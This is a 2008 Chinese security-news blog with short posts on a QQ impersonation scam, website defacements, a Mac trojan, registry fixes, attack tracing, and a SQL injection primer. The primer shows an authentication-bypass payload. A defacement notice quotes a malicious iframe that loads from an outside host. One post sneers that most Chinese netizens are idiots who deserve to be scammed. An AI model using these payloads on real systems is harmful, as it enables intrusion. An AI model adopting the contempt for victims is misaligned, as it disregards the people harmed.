Posted by Hacker on 06月 28, 2008
现在网络诈骗的形式越来越多,日前义乌出现一骗子使用黑客程序破解用户密码,然后冒名顶替向事主的QQ好友借钱,“朋友在QQ里发来短信要4000元急用,看看视频里的确是本人,于是我就寄钱了”,钟女士没想到这却是一个网络新骗局。
我们来解析下黑客是如何实施诈骗的。
首先黑客通过各种渠道(比如入侵网站后挂木马、提供带病毒的文件下载等等)盗取了用户的QQ密码,狡猾的黑客这个时候是不会修改你的QQ密码的,接下来会用另外一个QQ号码,一般是冒充天真无知的女孩来加你,然后借机跟你视频,当你看到对面是个漂亮的女人的时候可千万别美,你已经被人算计了。其实跟你视频的根本就不是女人,而你的照片早已被黑客录制下来,有可能你看到的女人也是黑客早已录制的。接下来黑客会修改掉你的QQ密码,然后就是冒充你在你的QQ好友里寻找诈骗的目标。前面提到的钟女士就是一个很好的例子。
其实黑客的伎俩并不高,只是中国的网民,90%的是白痴(我实话实说),除了玩玩游戏、逗下女孩我想他们没什么在行的。对于这样的人我并不会因为他们被骗而感到遗憾,不客气的说你早该被骗了。这个世界上从来没有强者同情弱者这回事。花钱买教训吧!
Posted by Hacker on 06月 27, 2008
负责监督网站域名的非盈利性组织“互联网域名与地址管理机构”(ICANN)被一群土耳其黑客攻破。
这实在是很讽刺的一件事情。一直提供网络域名安全指引的ICANN这回自身难保,同时被攻克的还有互联网地址指派机构(IANA)。这群土耳其黑客成功篡改了ICANN的主页,其留言大意为: 你们以为你们控制着所有的域名么?不对,包括你们的域名,都在我们的掌控之中。不相信?哇哈哈哈哈…
黑客还把ICANN的访问者重定向到Atspace.com这个域名下,而这个域名指向的ip是photobucket的,看来也被黑了。这群黑客也太牛了…
Posted by Hacker on 06月 26, 2008
互联网上发现了一种罕见的Mac OS X木马程序。这种名为“Apple-THT Trojan”的木马程序利用苹果Remote Desktop Agent(远程桌面代理)中的安全漏洞把自己安装到被攻破的Mac计算机中,并且拥有根权限。
这种恶意软件能够感染配置Mac OS X 10.4和10.5版本操作系统的Mac计算机并且把被感染计算机的控制权交给黑客。
Mac安全公司SecureMac报告称,黑客利用这个木马程序打开的安全漏洞能够记录被感染的计算机敲击键盘的动作,使用苹果计算机内置 的iSight照相机进行拍照或者捕捉截屏图像。这个恶意软件能够通过打开防火墙的端口和关闭系统记录等手段隐藏自己,设计恶意的手段。
SecureMac称,恶意人员已经在黑客控制的网站上发布了这种木马程序的许多变体。黑客们正在网络上讨论如何通过iChat即时消息客户端软件和Limewire文件共享软件传播这种木马程序。
这种木马程序或者以名为“ASthtv05”的编辑的Apple文件的形式出现,或者以捆绑的应用程序的形式出现。那个捆绑的应用程序容量为3.1MB。虽然这个木马程序利用一个最近发现的苹果Mac系统安全漏洞,但是,用户需要下载和打开这个木马文件才能被感染。
Posted by Hacker on 06月 25, 2008
简便快捷好方法 请看注册表应用点点通
1.快速删除键值
通常情况下我们要删除注册表中的某个键或者键值,都是打开“注册表编辑器”,然后定位到相关分支进行删除操作。但如果我们要对多台计算机做 同样的操作呢?或者这种删除操作是需要常常进行的呢?这就不方便了。其实可以通过将删除操作做成*.reg文件的形式,双击该*.reg文件即可完成删除操作。
删除某个注册表分支:打开“注册表编辑器”,将要删除的分支导出为*.reg文件,用“记事本”打开该文件,将形如 “[HKEY_LOCAL_MACHINE\SOFTWARE\……]”的字段修改为“[-HKEY_LOCAL_MACHINE\SOFTWARE \……]”即可。
删除某个注册表键:同样将该键导出为*.reg文件,用“记事本”打开该文件,将要删除键的键值修改为“-”即可,如要删除某名为“cfan”的键,则修改为形如:”cfan”=-。
2.修复文件的注册表关联
中了木马之后其实最麻烦的并不是查杀,而是查杀之后的系统设置恢复过程,由于木马普遍都对注册表比较感兴趣,而在查杀之后杀毒软件又不会自动修复注册表,所以经常出现杀毒后反而无法正常使用的情况。文件的注册表关联就是最典型的例子,如何快速修复它呢?
(1)由于无法运行文件,而又需要通过Regedit.来修改注册表,所以先要把C:\Windows目录下的Regedit.文件重命名为Regedit.com,运行Regedit.com启动“注册表编辑器”。
(2)定位到[HKEY_CLASSES_ROOT\.],将右侧窗口中“默认”的键值改为“file”。
(3)依次展开[HKEY_CLASSES_ROOT\file\shell\open\command]分支,然后将右侧窗口中的“默认”的键值改为“”%1″ %*”(不要外侧引号)。 Read more »
Posted by Hacker on 06月 23, 2008
观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。
SQL注入攻击的种类
知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。
1.没有正确过滤转义字符
在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。比方说,下面的这行代码就会演示这种漏洞:
statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;”
这种代码的设计目的是将一个特定的用户从其用户表中取出,但是,如果用户名被一个恶意的用户用一种特定的方式伪造,这个语句所执行的操作可能就不仅仅是代码的作者所期望的那样了。例如,将用户名变量(即username)设置为:
a’ or ‘t’='t,此时原始语句发生了变化:
SELECT * FROM users WHERE name = ‘a’ OR ‘t’='t’;
如果这种代码被用于一个认证过程,那么这个例子就能够强迫选择一个合法的用户名,因为赋值’t'=’t永远是正确的。 Read more »
Posted by Hacker on 06月 21, 2008
网络安全是一个综合的、复杂的工程,任何网络安全措施都不能保证万无一失。因此,对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。
追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主 机名;二是指确定攻击者的身份。网络攻击者在实施攻击之时或之后,必然会留下一些蛛丝马迹,如登录的纪录,文件权限的改变等虚拟证据,如何正确处理虚拟证 据是追踪网络攻击的最大挑战。
在追踪网络攻击中另一需要考虑的问题是:IP地址是一个虚拟地址而不是一个物理地址,IP地址很容易被 伪造,大部分网络攻击者采用IP地址欺骗技术。这样追踪到的攻击源是不正确的。使得以IP地址为基础去发现攻击者变得更加困难。因此,必须采用一些方法, 识破攻击者的欺骗,找到攻击源的真正IP地址。
★ netstat命令—-实时察看攻击者
使用netstat命令可以获得所有联接被测主机的网络用户的IP地址。Windows系列、Unix系列、Linux等常用网络操作系统都可以使用“netstat”命令。
使用“netstat”命令的缺点是只能显示当前的连接,如果使用“netstat”命令时攻击者没有 联接,则无法发现攻击者的踪迹。为此,可以使用Scheduler建立一个日程安排,安排系统每隔一定的时间使用一次“netstat”命令,并使用 netstat>>textfile格式把每次检查时得到的数据写入一个文本文件中,以便需要追踪网络攻击时使用。
★ 日志数据–最详细的攻击记录
系统的日志数据提供了详细的用户登录信息。在追踪网络攻击时,这些数据是最直接的、有效的证据。但是有些系统的日志数据不完善,网络攻击者也常会把自己的活动从系统日志中删除。因此,需要采取补救措施,以保证日志数据的完整性。
Read more »
Posted by Hacker on 06月 19, 2008
互联网的安全在今天越来越被更多的人重视。人们采用各种办法来保护网络安全。可总也避免不了这样那样的攻击、漏洞。下面例举了十种可瞬间毁掉整个互联网的袭击手段,让大家看看。也希望大家在日常上网或工作时能够注意到。
1. DNS (域名解析服务)被颠覆了。互联网的正常运行全靠 DNS。如果有人破坏——或更糟,颠覆了——网站访问的基石,人们将会不再相信什么 URL 网址,网络欺诈也将变得如同儿戏,因为:占有 DNS 者,占有互联网。
2. 僵尸网络攻击!无数“肉鸡”电脑已被控制,躲在阴暗潮湿不通风角落的黑客只需一声令下,即可发起攻击。 MessageLabs 的 Matt Sergeant 估计僵尸网络病毒控制了 5-10 百万的计算机(但有人认为这个数字没这么大)。现在,这些僵尸机器人让我们的收件箱充满了垃圾邮件,而过去,它们只是用来发泄一下不满情绪或者勒索恐吓一 下网站。但最终,这将演变为一场军备竞争,只不过其中一方不受任何规则的约束。
3. 物理设备发生大规模故障。如果弄断几根地中海的电缆,可以让成千上万的用户无网可上。如果有人蓄意搞破坏,后果将不堪设想啊!
4. 肢解为 N 个独立网络。从古老的 Usenet 至今,人们一直进行着“物以类聚”的分组行为。Nicholas Carr 在《The Big Switch》 一书中指出:一项研究声称一个社区,不管保守或自由,其 90% 的链接都没能离开该社区。甚至,对某些参考链接工具进行配置以后,可以使访问者一直停留在具有相同观点的网站上。这样结果会怎样?一个个独立的信息孤岛, 人们分享的都是相同的观点和思想,并渐渐确信他们拥有唯一的、正确的答案。互联网的祖先们早有预见:这将是全球化社区之梦的破灭。 Read more »
Posted by Hacker on 06月 18, 2008
据网友通过QQ群报料,网易惊现违禁色情网站的宣传内容:
从URL上判断,该域名并非网易新闻频道。安全专家表示,这是不法黑客利用网易上传漏洞所篡改后的页面 。 Read more »
Posted by Hacker on 06月 18, 2008
上海电信公司:故障已找出并登出“治病”公告
据上海电信有关方面昨天表示,从本月13日开始,宽带用户开始比较多地出现断网故障,公司的故障受理部门陆续接到不少ADSL用户反映,在使用ADSL上网一段时间后会发生网络中断,拨号工具同时出现锁死以及无法响应的故障现象。上海电信方面没有透露受影响的用户数量。
上海电信有关人士透露,经技术人员现场检测分析,发现此类故障集中发生在使用WindowsXP操作系统及WindowsXP自带的PPPoE拨号软件的系统环境下。
发生断网前,XP操作系统可能会弹出“GenericHostProcessforWin32Services”的错误提示信息。“发生断 网的原因,是由于微软WindowsXP存在某个安全漏洞,被病毒利用攻击。”上海电信故障报修台的工作人员介绍说,微软已经发布了针对该漏洞的补丁程 序,用户给自己的电脑打上这个补丁,断网的故障便可以排除。 Read more »
Posted by Hacker on 06月 18, 2008
现在的苹果笔记本已经可以安装Windows操作系统了,当然这是因为苹果方面的主动变化硬件。而在普通x86的笔记本上安装苹果的OS X操作系统则是一件费力的事情。不过,近日,有黑客将这一切变得更简单。
据悉,安装是通过一项设备来实现。这款设备的名称为EFiX。EFiX能够通过USB接口插入笔记本来实现在普通笔记本上安装OS X操作系统的。插入EFiX后,只需插入OS X的光盘,重启电脑,就可以等待安装程序的执行了。相信之前已经有不少本本爱好者通过软件破解等方式来尝试安装OS X,不过的确是费时费力。EFiX多多少少为这些爱好者简化了繁琐的破解和安装程序。
据称EFiX已经经过了6个月的除错期了,计划将于6月23日推出。但比较遗憾的是作者没有给出怎样购买以及购买价格等信息。
ArtHacker观点:其实要在普通笔记本上安装OS X,也可以通过软件破解的方式,不过这种方式比较麻烦。而通过外插硬件设备则显得省事很多。不过,小编认为,OS X恐怕在苹果的笔记本才显得更有味道,虽然硬要在普通笔记本上安装使用,功能上不会有太大损失。
Posted by Hacker on 06月 18, 2008
去年,灰鸽子、熊猫烧香、磁碟机等一系列病毒不断爆发,扰乱了当前互联网的安宁。而据美国安全机构的一份统计报告显示2008年的网络安全威胁中, 各种新型网络钓鱼技术的增强、使得Botnet (僵尸网络)愈发泛滥。而在这背后是蕴含着巨大的经济利益,一个具有低成本、系统化的黑色产业链已经逐渐形成,互联网及个人电脑安全岌岌可危。
最深藏不露的“画皮”钓鱼技术愈发泛滥
安全专家分析称,网络钓鱼的安全威胁背后隐藏了一种越来越流行的被称为“画皮”技术和工具包。“画皮”是一种复杂的技术框架,用于帮助犯罪分子制造和实施网络钓鱼攻击,他们非常认真地能够希望欺骗网民并且隐藏钓鱼网站,利用僵尸网络的方法来保持钓鱼网站的长期有效性。
国际组织反钓鱼工作组在数字犯罪研究者峰会上报告说,“画皮”已占钓鱼攻击的近一半。反钓鱼工作组还指出如果真正完全使用快速潮水的技术,那么钓鱼网站会存活更长的时间并攻击更多的用户。
有迹象表明,“画皮”一般都涉及到同一个网络域名的几个不同的子域,而服务器大多数都在亚洲,特别是我们中国。举一个生动的假设例子:“被画皮的网 站可能设在北京,使用浙江的网络服务提供商,而操纵者可能在上海。安全专家和相关法律部门不能在第一时间快速封锁,这样你在玩魔兽的时候就已经被“画皮” 了,那么你的个人信息及游戏装备就已经落入操纵者手中。”也正是由于这些原因,有人用1995年老片《非常嫌疑犯》中凯文 史派西扮演的深藏不露的反派角色来形容岩钓这类恶意威胁。
然而在中国国内,互联网的安全问题形势也非常严峻,相较于国外只有过之而无不及。据国家计算机网络应急技术处理协调中心的评估数据显示,在全球的 620万台僵尸电脑中,约有360万台在中国,已经占到了58%以上。如果这些僵尸电脑同时发起攻击,其后果将不堪设想。中国在成为世界上网民最多的国家 的同时,也就成为了僵尸电脑最多的国家,还有可能成为网络安全的重灾区。 Read more »
Posted by Hacker on 06月 17, 2008
电脑秀官方网站遭黑客入侵,整个网站页面被植入恶意代码“< iframe src=http://nudsyhk2.cn/z51.htm?14 width=20 height=0 frameborder=0 >< /iframe >�”,请各位用户注意防范。
截图如下:
Posted by Hacker on 06月 16, 2008
德国、美国、英国、法国政府部门的网站接连受到黑客攻击,而多个外国媒体的报道认定黑客“来自中国”,甚至“中国军方”。为此,本报特地采访美国、英国、德国有关部门、机构和专家,试图追寻事件的真相。
“德国情报机关指中国军方是攻击的幕后主使的说法不太可靠。
他们的推测逻辑也许就是这样:计算机专家追踪到了木马程序的源头并发现它们来自中国的一些城市,然后看到这些城市有一些部队的驻地,于是估计这些攻击者来自中国军方。”
——德国专业杂志《CT》副总编辑耶尔格·库里
“最骇人听闻的行动”
8月26日,德国总理默克尔出访中国。同一天上市的德国杂志《明镜》封面上,一个黄色面孔的人从幕后向外窥探,封面故事标题颇为抢眼:黄色间谍。
报道指责在德国发生的越来越多的工业间谍活动与中国有关。文章援引德国有关部门消息称,经济部门、联邦总理府和三个政府部门的计算机系统被来自中国的木马病毒感染,而且这一黑客行动是有组织的,矛头直指中国政府。
9月3日,英国《金融时报》披露,五角大楼承认曾在6月遭到迄今为止最严重的黑客攻击,被迫关闭了包括美国国防部长盖茨办公室的电脑系统。报道中,一个匿名的某高级政府官员称:“极有可能与中国人民解放军有关。”
两天后,英国《卫报》报道称,根据英国首相办公室的消息,包括外交部在内的多个政府部门曾遭到来自中国的黑客袭击。
9月8日,法国《世界报》引述法国国防秘书长德隆说,法国政府的电脑网络也曾遭中国黑客入侵。
英国皇家联合研究所亚洲安全项目负责人、中国问题专家阿列克谢·尼尔称,中国的黑客攻击已经持续了“至少4年”,而“中国黑客攻击美国国防部网络的事件,是迄今为止最大胆、最骇人听闻的行动”。他认为这是中国军方在彰显实力。 Read more »
Posted by Hacker on 06月 13, 2008
前几天逛了逛死党的个人Blog,我的卡巴立马发出病毒警告,显然就是网页木马。个人感觉死党本人挂马不怎么可能,他的blog浏览量还算不错,怎么可能砸掉自己的招牌?后来在QQ上 询问他,原来是某个无聊的家伙入侵他的网站并且挂了网页木马。在经过一阵紧急处理后,Web方面的漏洞算是修补好了后来再次来到Blog,发现居然又被人 挂了马,看来这家伙留了一手.赶紧联系朋友,正巧他也发现了这个问题,并且顺利找到了这家伙的aspshell。刚好我在绿盟上浏览漏洞公告,无意中发现 一个好东西,赶快叫朋友对这个aspshell“手下留情”,看咱如何惩治这个入侵者。
利用漏洞戏弄入侵者
绿盟关于该漏洞的描叙是:“MicrosoftWindows的MSHTML.DLL在解析特制HTML时存在拒绝服务漏洞,远程攻击者可以通过诱骗用户访问特制的HTML页面导致IE崩溃。”同时也给出了漏洞的利用代码。这个漏洞已经出来了一些时日,可能大家觉得它的利用价值不高,很少有人注意到。也正是这种不重视的心态,导致微软方面至今都没有给出该漏洞的相关补丁。该漏洞的利用代码如下:
Read more »
Posted by Hacker on 06月 11, 2008
微软对Vista中的Windows防火墙做了重大改变,从而增强了安全性,让高级用户更容易配置及定制,同时保留了新手用户所需的简洁性。以下是网友整 理的Windows Vista防火墙使用,希望能对您有所帮助,不要让Windows Vista强大的防火墙无所事事。
一、采用两种界面来满足不同需求
Vista防火墙有两种独立的图形配置界面: 一是基本的配置界面,可以通过“安全中心”和“控制面板”来访问; 二是高级配置界面,用户在创建自定义的MMC后,可作为插件来访问。
这可以防止新手用户无意中的改变而导致连接中断,又为高级用户对防火墙设置进行更细化地定制以及控制出站和入站流量提供了一种方法。用户还可以在 netsh advfirewall上下文中使用命令,从命令行对Vista防火墙进行配置; 也可以编写脚本,针对一组计算机自动对防火墙进行配置; 还可以通过组策略来控制Vista防火墙的设置。
二、默认设置下的安全
Vista中的 Windows防火墙在默认状态下采用安全配置,同时仍支持最佳易用性。默认状态下,大多数入站流量被阻挡,出站连接被允许。Vista防火墙可与 Vista的Windows服务加固这项新功能协同工作,所以如果防火墙检测到被Windows服务加固网络规则禁止的行为,它就会阻挡该行为。防火墙还 完全支持纯IPv6的网络环境。 Read more »
